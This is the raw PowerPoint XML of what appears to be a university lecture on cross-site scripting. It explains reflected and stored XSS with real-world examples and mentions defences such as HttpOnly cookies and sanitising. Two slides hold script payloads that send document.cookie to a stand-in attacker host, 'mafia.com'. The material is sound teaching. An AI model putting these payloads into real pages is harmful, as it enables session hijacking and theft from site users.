            <a:ext cx="2682555" cy="498058"/>
            <a:chOff x="3479585" y="2038019"/>
            <a:chExt cx="2349488" cy="498058"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Right Arrow 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{361E9A79-6887-218E-6C16-744AD4C17B85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3479585" y="2038019"/>
              <a:ext cx="2349488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33" name="Rechthoek 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1438BD87-16E3-3C61-3F8B-C46117DBBF0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4489345" y="2188879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echthoek 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1EB33FD-566D-6726-BC2B-5CBBED3BB5C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4812343" y="2206564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hthoek 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{050388DC-1825-3915-3C12-04154CFE4375}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4139952" y="2198416"/>
              <a:ext cx="200697" cy="16096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36" name="Straight Arrow Connector 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57868BBF-F8AC-41B5-7EBE-08DC5F12A6C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1504260" y="3603634"/>
            <a:ext cx="124755" cy="155390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97" y="3494655"/>
            <a:ext cx="874367" cy="488119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="C:\Users\erikpoll\Desktop\Alice-PNG-alice-in-wonderland-33922018-444-800.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{963DD0F9-EB34-5041-738A-BEDBFB28A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91027" y="2631468"/>
            <a:ext cx="603596" cy="10181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51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Stealing cookies with XSS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352928" cy="55446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http://target.com/search.php?term</a:t>
            </a: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=&lt;script&gt;               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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window.open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(”http://mafia.com/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steal.php?stolencookie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=” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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              + 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document.cookie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) </a:t>
            </a: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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>What happens when user clicks on this link?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Browser goes to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http://target.com/search.php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Website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target.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>returns                                                            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-45720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&lt;HTML&gt; Results for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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(....)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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&lt;/script&gt;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&lt;/HTML&gt;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800" dirty="0"/>
              <a:t>Victim’s browser executes this script, sending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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       to mafia.com as a parameter in the URL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1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Attacker can now join the session!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"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800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NB cookie stealing is the standard XSS example, but a bit old-fashioned. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Websites should declare important cookies as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>making it impossible from JavaScript code to access the cookie.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>But attackers can still steal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>any other info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perform any actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>in the user’s browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.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0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More stealthy stealing of cookies using XSS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    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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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 new Image();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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img.src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=”http://mafia.com/” + </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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     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encodeURIComponent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document.cookie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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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&lt;/script&gt;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dirty="0"/>
              <a:t>Better because the user won’t notice a change in the webpage or             a pop-up window when this script is executed,                                                     unlike the example on the previous slide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i="1" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Why is URL-encoding (with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>useful?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      Special characters in the cookie could cause problems in the URL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3396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Scenario 1: reflected XSS attack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+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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>
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker crafts malicious URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>containing JavaScript for vulnerable website    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="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https://google.com/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search?q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=&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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>
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker then tempts victim to click on this link </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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>
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>by sending email with the link, or posting this link on a website</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1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2000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79121" y="6354775"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm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E3174C83-2BE8-4605-8472-BD9D1F58D0E1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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18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1096693" y="2852936"/>
            <a:ext cx="6139603" cy="3031397"/>
            <a:chOff x="-585123" y="1658235"/>
            <a:chExt cx="7584216" cy="4010074"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-585123" y="2710660"/>
              <a:ext cx="1551735" cy="85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pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US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URL</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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>
              <a:off x="3734425" y="2897972"/>
              <a:ext cx="1930400" cy="111247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web server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Right Arrow 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="572866" y="3107654"/>
              <a:ext cx="1373532" cy="4320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pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 3" descr="C:\Users\erikpoll\Desktop\Alice-PNG-alice-in-wonderland-33922018-444-8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83568" y="4077072"/>
              <a:ext cx="864096" cy="1591237"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Right Arrow 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-1560000" flipH="1">
              <a:off x="1699376" y="4103744"/>
              <a:ext cx="1872208" cy="46734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1" name="Straight Arrow Connector 31"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="10" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2123728" y="3864382"/>
              <a:ext cx="1353117" cy="745254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3588" y="1658235"/>
              <a:ext cx="792087" cy="912048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2627782" y="4509121"/>
              <a:ext cx="4371311" cy="854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HTML response containing malicious output</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB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sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Right Arrow 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-1560000">
              <a:off x="1466974" y="3705480"/>
              <a:ext cx="2042966" cy="4320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52426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Scenario 2: stored XSS attack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2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker injects HTML - incl. scripts - into a web site, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stored at that web site  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>Brightspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> forum posting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"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>
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echoed back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>later </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> when victim visit the same site</a:t>
            </a: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>
              <a:solidFill>
                <a:srgbClr val="0033CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="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sz="2000" dirty="0"/>
              <a:t>Extra advantage: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the victim is likely to be logged on to the website</a:t>
            </a:r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dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"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1800" dirty="0"/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2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" pitchFamily="66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4629929-24B6-4ADD-BF3F-73ECBF1983EF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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18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467544" y="2162265"/>
            <a:ext cx="6907229" cy="2979605"/>
            <a:chOff x="-612575" y="1595616"/>
            <a:chExt cx="8352927" cy="3933540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2339753" y="1595616"/>
              <a:ext cx="1944217" cy="85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malicious</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US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input</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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7" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3635896" y="3140968"/>
              <a:ext cx="1584176" cy="1041235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web server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8" name="Curved Down Arrow 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3923928" y="2420888"/>
              <a:ext cx="1152128" cy="648072"/>
            </a:xfrm>
            <a:prstGeom prst="curvedDownArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 41530"/>
                <a:gd name="adj2" fmla="val 75736"/>
                <a:gd name="adj3" fmla="val 274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9" name="Flowchart: Magnetic Disk 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6444208" y="2780928"/>
              <a:ext cx="1296144" cy="1368152"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk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data</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="20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base</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="20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10" name="Right Arrow 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5436096" y="3212976"/>
              <a:ext cx="864096" cy="43204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1" name="Straight Arrow Connector 35"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5508104" y="3429000"/>
              <a:ext cx="504056" cy="0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41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4067944" y="2708920"/>
              <a:ext cx="144016" cy="72008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49"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4631910" y="2598028"/>
              <a:ext cx="216025" cy="144016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ight Arrow 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1560000">
              <a:off x="2076913" y="2484059"/>
              <a:ext cx="1373532" cy="432048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5" name="Right Arrow 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5364088" y="3573016"/>
              <a:ext cx="792088" cy="432048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16" name="Straight Arrow Connector 30"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5580112" y="3789040"/>
              <a:ext cx="504056" cy="0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3" descr="C:\Users\erikpoll\Desktop\Alice-PNG-alice-in-wonderland-33922018-444-80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902989" y="3937919"/>
              <a:ext cx="864096" cy="1591237"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-612575" y="3539610"/>
              <a:ext cx="3384376" cy="12189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rial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>another user</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>of the same </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>website  </a:t>
              </a:r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19" name="Right Arrow 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-1560000" flipH="1">
              <a:off x="1699376" y="4103744"/>
              <a:ext cx="1872208" cy="467347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  <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Arrow Connector 31"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2123728" y="3889440"/>
              <a:ext cx="1353117" cy="720196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5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2771801" y="4509120"/>
              <a:ext cx="2808312" cy="853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HTML containing malicious output</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/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23" name="Picture 2" descr="C:\Users\erikpoll\Desktop\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69531" y="1795374"/>
              <a:ext cx="1080120" cy="1080120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Right Arrow 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-1560000">
              <a:off x="1650645" y="3871175"/>
              <a:ext cx="1738256" cy="21408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56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AC67-99C0-C2CB-EDA3-8088D3592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HackNijmegen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  aka  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NymaCon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580A5-F550-F97B-A0B6-2A2A946B6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you think web hacking of websecurity.cs.ru.nl is fun </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - and (too) easy?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Friday Nov 8 (whole day, at VASIM)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solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>annual hacking event by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>munipality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Nijmegen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Tuesday Nov 5 (from 17:30-21:00 in Mercator)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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>preparation session by Francisco of Hunt and Hackett</a:t>
            </a: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CFDD3-B8C2-C5D5-B9CB-9A054E6BE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88FB4F-0B67-1926-36BD-492F6CFF5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934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0" dirty="0"/>
              <a:t>Examples of XSS attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="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28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JavaScript game injected into Blackboard.ru.nl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61" y="1100933"/>
            <a:ext cx="7119360" cy="51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235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Example: stored XSS vulnerability via Twitter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" i="1" dirty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0928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0030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 i="1" dirty="0"/>
              <a:t>Example: stored XSS attack via Google docs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059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000" dirty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000" dirty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000" dirty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000" dirty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000" dirty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dirty="0"/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dirty="0"/>
              <a:t>Save as CSV file in spreadsheets.google.com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dirty="0"/>
              <a:t>Some web browsers rendered this content as HTML and executed the script!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1800" dirty="0"/>
              <a:t>This allowed attacks on gmail.com, docs.google.com, code.google.com, ..  because these all share the same cookie</a:t>
            </a:r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1800" i="1" dirty="0"/>
              <a:t>Is this the browser’s fault, or the web-site’s (i.e. google-docs) fault?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" i="1" dirty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0B7E7E6D-26A3-463F-8252-1327AA899E1F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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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6242050" cy="2444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21191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Example: Reflected XSS via error message</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2000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Like search fields, error messages are a well-known attack vector for reflected XSS</a:t>
            </a:r>
          </a:p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US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Suppose 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           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http://www.example.com/page?var=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endParaRPr lang="en-US" sz="18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     returns a webpage with the error message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           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"Resource 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foo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is not found"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/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 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Then  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http://www.example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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page?var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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GB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&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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returns an error page with the script on it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="107950" indent="0"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If not encoded and/or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sanitised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> properly, the browser will execute the script .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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5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i="1" dirty="0"/>
              <a:t>Example: Twitter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>StalkDaily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> worm</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" i="1" dirty="0"/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Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>  Included in twitter profile:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>     &lt;a </a:t>
